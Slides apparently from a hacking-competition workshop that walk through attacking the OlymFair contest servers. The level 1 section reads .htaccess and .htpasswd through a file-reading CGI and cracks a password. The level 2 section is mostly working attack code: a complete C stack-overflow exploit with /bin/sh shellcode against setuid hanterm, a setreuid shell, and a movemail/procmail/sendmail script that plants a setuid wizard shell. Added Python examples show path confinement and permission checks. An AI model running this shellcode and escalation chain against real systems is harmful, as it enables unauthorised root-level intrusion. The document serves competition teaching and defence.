1st OlymFair Workshop: Hacking technique
Taeho Oh
http://postech.edu/~ohhara
Contents
• How to pass level 1
• How to pass level 2
• Why did many hackers spend so much time on level 2?
• About level 3
• Conclusion
How to pass level 1 (1)
• What to do?
– Execute /cgi-bin/data/idaccess.cgi and get the way to go to level 2
How to pass level 1 (2)
• Level 1 servers
– 203.227.243.161
– 203.227.243.162
– 203.227.243.163
How to pass level 1 (3)
• 203.227.243.161
– OS : Solaris 8
– Opened TCP ports : 80, 8080
How to pass level 1 (4)
• 203.227.243.162
– OS : HP-UX 11.0
– Opened TCP ports : 22, 80, 8080
How to pass level 1 (5)
• 203.227.243.163
– OS : MS Windows 2000
– Opened TCP ports : 7, 9, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 3389
How to pass level 1 (6)
• Attack 203.227.243.161
– 80 : Apache Web Server
– 8080 : Netscape Enterprise Server
• The web servers on 80 and 8080 share the same httpd home directory (document root)
• Netscape Enterprise Server has a security bug
How to pass level 1 (7)
• Netscape Enterprise Server security bug
– I could list the files in a given directory with a request like the one below
• http://203.227.243.161/?wp-cs-dump
– You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
– I could browse the directories and check whether a given file exists
How to pass level 1 (8)
• The file list
/
+----- cgi-bin/
|      +----- data/            (can't access this directory: protected by .htaccess)
|      +----- hackme/
|             +----- a
|             +----- a.c
|             +----- show_file.html
|             +----- showfile.cgi
+----- data/
+----- index.html
How to pass level 1 (9)
• Read the .htaccess file with showfile.cgi
– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htaccess
• Read the .htpasswd file named in .htaccess, again with showfile.cgi
– http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd
How to pass level 1 (10)
• I could crack the encrypted password from .htpasswd with Crack
– id:password = admin:banana
– I could access the /cgi-bin/data directory with this id and password
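The whole level 1 chain rests on a CGI that opens whatever its NAME parameter names. As an added example that is not part of the original slides (the real showfile.cgi source is not on the page, so its behaviour is assumed from the two URLs above), here is that assumed behaviour next to a confined version: resolve the path first, require it to stay inside the one directory the CGI serves, and never serve dotfiles. The document root, file names and contents are constructed for the example, and the .htpasswd hash is a placeholder:

```python
"""Path confinement for a NAME=-style file-serving CGI (added example)."""
import os
import tempfile

# Constructed miniature of the document root from the listing on slide (8).
# Only the layout is taken from the page; the file contents are made up here.
DOCROOT = tempfile.mkdtemp(prefix="olymfair-docroot-")
HACKME = os.path.join(DOCROOT, "cgi-bin", "hackme")   # where showfile.cgi lives
DATA = os.path.join(DOCROOT, "cgi-bin", "data")       # the .htaccess-protected directory
os.makedirs(HACKME)
os.makedirs(DATA)
with open(os.path.join(HACKME, "show_file.html"), "w") as fh:
    fh.write("<form action=showfile.cgi><input name=NAME></form>\n")
with open(os.path.join(DATA, ".htaccess"), "w") as fh:
    fh.write("AuthUserFile /home/httpd/cgi-bin/data/.htpasswd\n")   # hypothetical path
with open(os.path.join(DATA, ".htpasswd"), "w") as fh:
    fh.write("admin:PLACEHOLDERHASH\n")                            # placeholder, not a real hash


def showfile_vulnerable(name):
    """Assumed behaviour of the original showfile.cgi: NAME is appended to the
    document root and opened with no check at all, so every file the web server's
    uid can read, including the .htaccess/.htpasswd pair, comes back to the client."""
    path = os.path.join(DOCROOT, name.lstrip("/"))
    with open(path, "rb") as fh:
        return fh.read()


def showfile_hardened(name):
    """Serve only regular, non-dot files that resolve to a location inside HACKME."""
    if "\0" in name:
        raise PermissionError("NUL byte in path")
    root = os.path.realpath(HACKME)
    # Resolve '..' and symlinks *before* comparing; a textual check on NAME is not enough.
    target = os.path.realpath(os.path.join(root, name.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        raise PermissionError("path escapes the served directory")
    rel = os.path.relpath(target, root)
    if any(part.startswith(".") for part in rel.split(os.sep)):
        raise PermissionError("dotfiles such as .htaccess/.htpasswd are never served")
    if not os.path.isfile(target):
        raise FileNotFoundError(name)
    with open(target, "rb") as fh:
        return fh.read()


def serve(name, handler=showfile_hardened):
    """Map the handler's outcome onto the HTTP status a CGI would emit: (status, body)."""
    try:
        return 200, handler(name)
    except PermissionError:
        return 403, b""
    except FileNotFoundError:
        return 404, b""


if __name__ == "__main__":
    for request in ("/cgi-bin/data/.htaccess", "../data/.htaccess", "show_file.html"):
        print("vulnerable %-28s -> %s" % (request, serve(request, showfile_vulnerable)[0]))
        print("hardened   %-28s -> %s" % (request, serve(request)[0]))
```

Note that the confinement check is only half of the fix: the CGI runs with the web server's uid, so it can read anything that uid can, and an .htpasswd kept under the document root is one directory traversal away from the client. Moving .htpasswd outside the document root removes the second half of the chain even if another CGI turns out to be sloppy.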
How to pass level 1 (11)
• I could get the way to go to level 2
– http://203.227.243.161/data/idaccess.html
• This page is the form that executes http://203.227.243.161/cgi-bin/data/idaccess.cgi
– My serial number
• KOR000321-961829513
– My password
• oD8YEuqYySWogKSQQsOY00zoAjUkxtv7
How to pass level 1 (12)
• Netscape Enterprise Server directory indexing vulnerability
– See http://www.securityfocus.com/vdb/bottom.html?vid=1063
How to pass level 1 (13)
• Netscape Enterprise Server directory indexing vulnerability patch information
The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature.
Also, manually editing the file obj.conf will do the same. Conduct a search for the following:
Service method="(GET|HEAD)" type="magnus-internal/directory" fn="index-common"
and replace fn="index-common" with fn="send-error".
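The obj.conf edit quoted above, as an added example that is not from the advisory or the original slides: a check that reports which Service directive still hands directory requests to an indexer, and the rewrite to send-error. The obj.conf fragment is constructed; only the directory-indexing Service line is the one the advisory gives, the other directives are assumed filler in the same syntax.

```python
"""Check and apply the obj.conf directory-indexing fix (added example)."""
import re

# Constructed obj.conf fragment in NES/iPlanet syntax. The directory-indexing Service
# line is the one the advisory quotes; the surrounding directives are assumed filler.
SAMPLE_OBJ_CONF = """\
<Object name="default">
NameTrans fn="document-root" root="/usr/netscape/server4/docs"
PathCheck fn="find-index" index-names="index.html,home.html"
ObjectType fn="type-by-extension"
Service method="(GET|HEAD)" type="magnus-internal/directory" fn="index-common"
Service method="(GET|HEAD)" type="*~magnus-internal/*" fn="send-file"
AddLog fn="flex-log" name="access"
</Object>
"""

DIRECTORY_TYPE = 'type="magnus-internal/directory"'
FN_ATTR = re.compile(r'\bfn="([^"]*)"')


def _is_directory_service(line):
    """A Service directive that decides what happens when the request names a directory."""
    return line.lstrip().startswith("Service") and DIRECTORY_TYPE in line


def directory_handlers(conf):
    """fn= value of every directory Service directive, in file order."""
    handlers = []
    for line in conf.splitlines():
        if _is_directory_service(line):
            m = FN_ATTR.search(line)
            handlers.append(m.group(1) if m else None)
    return handlers


def directory_indexing_enabled(conf):
    """True if any directory request is still routed to something other than send-error."""
    return any(fn != "send-error" for fn in directory_handlers(conf))


def disable_directory_indexing(conf):
    """Apply the advisory's edit, fn="index-common" -> fn="send-error", on directory
    Service lines only. Returns (new_conf, number_of_lines_changed)."""
    out, changed = [], 0
    for line in conf.splitlines(keepends=True):
        if _is_directory_service(line):
            line, n = re.subn(r'\bfn="index-common"', 'fn="send-error"', line)
            changed += n
        out.append(line)
    return "".join(out), changed


if __name__ == "__main__":
    print("before:", directory_handlers(SAMPLE_OBJ_CONF))
    fixed, n = disable_directory_indexing(SAMPLE_OBJ_CONF)
    print("after: ", directory_handlers(fixed), "(%d line(s) changed)" % n)
```

The check is deliberately stricter than the rewrite: it flags any handler that is not send-error, so a directory object that was pointed at some other indexer by hand still shows up. The ?wp- commands listed on slide (7) belong to the server's web publishing interface; turning off directory indexing removes the listing, and a server that does not need web publishing should not expose it at all.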
How to pass level 2 (1)
• What to do?
– Execute /home/forbidden/pass.cgi
• The owner of this executable is root
• Its group is wizard
• Its permission is 0510 (owner r-x, group --x, other none)
• So the wizard gid is needed to execute /home/forbidden/pass.cgi
How to pass level 2 (2)
• Level 2 server
– 203.227.243.164
• 203.227.243.164
– OS : Linux
– Opened TCP ports : 23, 81
How to pass level 2 (3)
• Wizard setuid or setgid files
-r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
-rwsr-xr-x 1 wizard wizard 10708 Apr 20 1999 /sbin/cardctl
-rws--x--x 1 wizard wizard 6148 May 15 1999 /usr/X11R6/bin/Xwrapper
-rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at
-rwsr-xr-x 1 wizard wizard 3208 Mar 23 1999 /usr/bin/disable-paste
-r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
-r-sr-x--- 1 wizard wizard 40060 Aug 31 1999 /usr/bin/startinnfeed
-r-sr-sr-x 1 wizard wizard 15816 Jan 7 07:41 /usr/bin/lpq
-r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr
-r-sr-sr-x 1 wizard wizard 16248 Jan 7 07:41 /usr/bin/lprm
How to pass level 2 (4)
• Wizard setuid or setgid files ( Cont. )
-rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/suidperl
-rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/sperl5.00503
-rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail
-rwsr-xr-x 1 wizard wizard 14036 Apr 16 1999 /usr/bin/rcp
-rwsr-xr-x 1 wizard wizard 10516 Apr 16 1999 /usr/bin/rlogin
-rwsr-xr-x 1 wizard wizard 7780 Apr 16 1999 /usr/bin/rsh
-rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail
-rwsr-xr-x 1 wizard wizard 16488 Mar 23 1999 /usr/sbin/traceroute
-rwsr-xr-x 1 wizard wizard 18040 Jan 8 05:24 /usr/sbin/userhelper
-rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport
How to pass level 2 (5)
• Attack process
level2 shell → wizard euid → wizard uid → create wizard uid, gid file → wizard gid → execute pass.cgi
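Two things on slides (1), (3)-(4) and (5) above deserve a check a practitioner would actually run before picking a target: which of the wizard setuid/setgid binaries the level 2 account can execute at all (the -r-sr-x--- ones cannot be, because the account is not in group wizard), and why a wizard euid on its own does not let you run a 0510 root:wizard pass.cgi. This is an added example, not code from the original slides; the listing lines are a subset copied from slides (3)-(4), the attacker's group "hackers" is taken from the ls -l output on slide (15), and the attacker's uid name is an assumption (the real uid has no passwd entry, hence the "I have no name!" prompt):

```python
"""Triage of setuid/setgid candidates and the Unix execute check (added example)."""
import stat

# Subset of the "wizard setuid or setgid files" listing on slides (3) and (4).
LISTING = """\
-rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
-rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
-r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
-r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr
-rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail
-rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport
"""

ATTACKER_UID = "level2-user"   # assumed name; the real uid has no passwd entry
ATTACKER_GID = "hackers"       # from the ls -l output on slide (15)

# /home/forbidden/pass.cgi as described on slide (1).
PASS_CGI = {"mode": 0o510, "owner": "root", "group": "wizard"}


def parse_mode(text):
    """Convert an ls -l mode string such as '-rwsr-sr-x' into st_mode permission bits."""
    if len(text) != 10:
        raise ValueError("not a mode string: %r" % text)
    mode = 0
    for i, ch in enumerate(text[1:]):
        bit = 0o400 >> i                  # user rwx, then group rwx, then other rwx
        if ch in "rwx":
            mode |= bit
        elif ch in "sS":                  # 's' = setuid/setgid plus x, 'S' = without x
            mode |= stat.S_ISUID if i == 2 else stat.S_ISGID
            if ch == "s":
                mode |= bit
        elif ch in "tT":
            mode |= stat.S_ISVTX
            if ch == "t":
                mode |= bit
        elif ch != "-":
            raise ValueError("bad mode character %r" % ch)
    return mode


def may_exec(mode, owner, group, euid, egid, groups=()):
    """Unix execute check: exactly one class applies (owner if euid matches, else group
    if egid or a supplementary group matches, else other). Root's bypass is not modelled."""
    if euid == owner:
        return bool(mode & stat.S_IXUSR)
    if egid == group or group in groups:
        return bool(mode & stat.S_IXGRP)
    return bool(mode & stat.S_IXOTH)


def triage(listing, euid=ATTACKER_UID, egid=ATTACKER_GID):
    """For each listed file, the credentials it would hand this caller, or [] if the
    caller cannot even execute it."""
    result = {}
    for line in listing.splitlines():
        fields = line.split()
        if not fields:
            continue
        mode, owner, group, path = parse_mode(fields[0]), fields[2], fields[3], fields[-1]
        gains = []
        if may_exec(mode, owner, group, euid, egid):
            if mode & stat.S_ISUID:
                gains.append("euid=" + owner)
            if mode & stat.S_ISGID:
                gains.append("egid=" + group)
        result[path] = gains
    return result


def can_run_pass_cgi(euid, egid, groups=()):
    """Whether a process with these credentials may execute /home/forbidden/pass.cgi."""
    return may_exec(PASS_CGI["mode"], PASS_CGI["owner"], PASS_CGI["group"], euid, egid, groups)


if __name__ == "__main__":
    for path, gains in triage(LISTING).items():
        print("%-55s %s" % (path, ", ".join(gains) or "not executable by the attacker"))
    print("euid=wizard, egid=hackers ->", can_run_pass_cgi("wizard", "hackers"))
    print("euid=%s, egid=wizard -> %s" % (ATTACKER_UID, can_run_pass_cgi(ATTACKER_UID, "wizard")))
```

The second result is the reason the attack process above has to go through movemail and procmail after hanterm: hanterm is setuid only, so it gives euid wizard, but pass.cgi has no owner or other bits that help, and only the group class, checked against egid and supplementary groups, grants execute.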
How to pass level 2 (6)
• level2 shell → wizard euid
– Exploit hanterm bug
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x240"`
can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[I have no name!@level2 ... ]$ hanterm -hfn `perl -e "print 'A'x250"`
Segmentation fault
[I have no name!@level2 ... ]$
How to pass level 2 (7)
• level2 shell → wizard euid (Cont.)
– This is a classic stack buffer overflow bug
– I could get a wizard euid shell with a buffer size of 260 and an offset of -450
How to pass level 2 (8)
• Exploit code (the six code slides joined into one listing; the smart quotes of the PDF are replaced by straight quotes, the missing headers added, main returns int, and the address-fill loop is kept inside the buffer)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define OFFSET -450          /* distance below our own %esp where hanterm's copy of the argument was found */
#define RET_POSITION 260     /* offset of the saved return address within the -hfn argument */
#define RANGE 20
#define NOP 0x90

/* Classic Linux/i386 execve("/bin/sh") shellcode. The whole exploit is 32-bit only:
 * it assumes sizeof(long) == 4 and a stack that is both predictable and executable. */
char shellcode[1024]=
"\xeb\x1f"                  /* jmp 0x1f */
"\x5e"                      /* popl %esi */
"\x89\x76\x08"              /* movl %esi,0x8(%esi) */
"\x31\xc0"                  /* xorl %eax,%eax */
"\x88\x46\x07"              /* movb %eax,0x7(%esi) */
"\x89\x46\x0c"              /* movl %eax,0xc(%esi) */
"\xb0\x0b"                  /* movb $0xb,%al */
"\x89\xf3"                  /* movl %esi,%ebx */
"\x8d\x4e\x08"              /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c"              /* leal 0xc(%esi),%edx */
"\xcd\x80"                  /* int $0x80 */
"\x31\xdb"                  /* xorl %ebx,%ebx */
"\x89\xd8"                  /* movl %ebx,%eax */
"\x40"                      /* inc %eax */
"\xcd\x80"                  /* int $0x80 */
"\xe8\xdc\xff\xff\xff"      /* call -0x24 */
"/bin/sh";                  /* .string "/bin/sh" */

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");   /* i386 only: the return value is whatever is left in %eax */
}

int main(int argc,char **argv)
{
    char buff[RET_POSITION+RANGE+1],*ptr;
    long *addr_ptr,addr;
    unsigned long sp;
    int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
    int i;

    if(argc>1)
        offset=atoi(argv[1]);          /* try another offset from the command line */
    sp=get_sp();
    addr=sp-offset;                    /* guessed address of the NOP sled inside hanterm's stack */
    ptr=buff;

    /* Fill the whole buffer with the guessed address ... */
    addr_ptr=(long*)ptr;
    for(i=0;i+sizeof(long)<=bsize;i+=sizeof(long))   /* original condition i<bsize wrote 3 bytes past buff */
        *(addr_ptr++)=addr;
    /* ... then overwrite the front with a NOP sled and the shellcode, leaving
     * RANGE*2 bytes of return addresses at the end, which cover RET_POSITION. */
    for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
        buff[i]=NOP;
    ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
    for(i=0;i<strlen(shellcode);i++)
        *(ptr++)=shellcode[i];
    buff[bsize-1]='\0';

    execl("/usr/X11R6/bin/hanterm","hanterm","-hfn",buff,(char *)0);
    perror("execl");                   /* only reached if hanterm could not be started */
    return 1;
}
How to pass level 2 (14)
• wizard euid → wizard uid
[I have no name!@level2 ... ]$ cat > a.c
#include <unistd.h>
int main(){
setreuid(501,501);               /* 501 = wizard; allowed because the effective uid is already wizard */
execl("/bin/sh","sh",(char *)0);
return 1;
}
[I have no name!@level2 ... ]$ gcc a.c ; ./a.out
[wizard@level2 ... ]$ whoami
wizard
[wizard@level2 ... ]$
How to pass level 2 (15)
• wizard uid → create wizard uid, gid file
– movemail is a wizard setgid program
• The output file of movemail gets the wizard gid (and the caller's uid, which is wizard by now)
[wizard@level2 ... ]$ echo haha > test1
[wizard@level2 ... ]$ movemail test1 test2
[wizard@level2 ... ]$ ls -l test1 test2
-rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1
-rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2
[wizard@level2 ... ]$ cat test2
haha
How to pass level 2 (16)
• wizard uid, gid file → wizard gid
– procmail executes arbitrary shell commands with the wizard uid and gid once the user can create a file owned wizard:wizard: procmail only trusts a ~/.procmailrc owned by the recipient, and movemail can now write exactly such a file
How to pass level 2 (17)
• Exploit code (the three script slides joined into one listing; the C part gains its header and a proper NULL terminator for execl)

#!/bin/sh
# Run from /tmp in the wizard-uid shell obtained above; the procmail recipe names /tmp/shh2,
# and the script deletes itself under the name ./exp.
PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux   # so that a plain "movemail" runs the setgid copy
export PATH
cat > shh.c << EOF
#include <unistd.h>
int main(){
setreuid(501,501);
setregid(501,501);
execl("/bin/sh","sh",(char *)0);
return 1;
}
EOF
gcc shh.c -o shh
movemail shh shh2                            # shh2 is now owned wizard:wizard (uid from us, gid from setgid movemail)
cat > proc << EOF
:0
*
| /bin/chmod 6777 /tmp/shh2
EOF
movemail proc /home/wizard/.procmailrc       # accepted by procmail because wizard owns it
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard   # local delivery runs procmail as wizard:wizard, which runs the recipe
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2                 # shh2 is now setuid+setgid wizard; here it is run once with a command on stdin that deletes it
How to pass level 2 (20)
• wizard gid → execute pass.cgi
Congratulation!!
You have passed Level 2.
Your ID : KOR000321-961829513
Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9
IP for Level 3 is 203.227.243.173
It is protected by ip filtering.
Please attack and acquire adminstrator's privilege.And then change the index.html under level3 server.
Level 3 Login ID : level3
Level 4 Login Passwd : olymfair3
Why did many hackers spend so much time on level 2? (1)
• Almost all hackers tried to find a security bug
– However, level 2 can be cleared not with a bug but with a feature (apart from the hanterm bug needed for the first step)
Why did many hackers spend so much time on level 2? (2)
• /sbin/dump has a buffer overflow bug, and no exploit has been released
– Many hackers tried to exploit this program. However, the exploit is impossible because main() never returns: it calls exit(), so the overwritten return address is never used
Why did many hackers spend so much time on level 2? (3)
• The /usr/bin/lprm exploit code produces a segmentation fault message
– The segmentation fault is not generated by /usr/bin/lprm. It is generated by the /usr/bin/lprm exploit code itself: a bug in the exploit, not in lprm
About level 3
• I spent much time on level 2, so I had no time left to attack level 3
• I tried to scan the level 3 server
– However, I could not find any open TCP port
– I did not try to attack level 3 after that
• It seemed it would take much time
Conclusion
• It was an interesting hacking competition